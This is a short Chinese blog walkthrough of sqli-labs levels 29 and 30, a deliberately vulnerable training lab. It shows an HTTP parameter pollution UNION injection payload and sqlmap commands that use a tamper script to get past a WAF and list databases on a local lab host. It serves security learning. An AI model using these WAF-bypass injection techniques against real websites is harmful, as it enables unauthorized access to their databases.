sqli-labs第二十九三十

Less-29(GET - Error based - IMPIDENCE MISMATCH - Having a WAF in front of web application)

手工注入

正常注入的时候发现

sqli-labs第二十九三十_第1张图片

此处似乎没有sql注入

但是我上一个说了这个是有waf的

http://192.168.21.149/Less-29/?id=1&id=0‘union select 1,2,3--+

这里其实已经确定有sql注入了,后面的和sqli-labs第一二关-CSDN博客一样

自动注入

waf需要脚本绕过kali的脚本在 /usr/share/sqlmap/tamper/

 sqlmap -u http://192.168.21.149/Less-29/?id=1  --tamper /usr/share/sqlmap/tamper/0eunion.py --batch

sqli-labs第二十九三十_第2张图片

 sqlmap -u http://192.168.21.149/Less-29/?id=1  --tamper /usr/share/sqlmap/tamper/0eunion.py --dbs --batch

sqli-labs第二十九三十_第3张图片

后面的流程就和sqli-labs第一二关-CSDN博客一样

Less-30(GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application)

手工注入

错误反应

sqli-labs第二十九三十_第4张图片

双引号闭合

和29关一样的payload

自动注入

和第29关一样但是命令有点小区别

sqlmap -u 'http://192.168.21.149/Less-30/?id=1"' --tamper /usr/share/sqlmap/tamper/0eunion.py --batch

sqli-labs第二十九三十_第5张图片

你可能感兴趣的:(sql,数据库)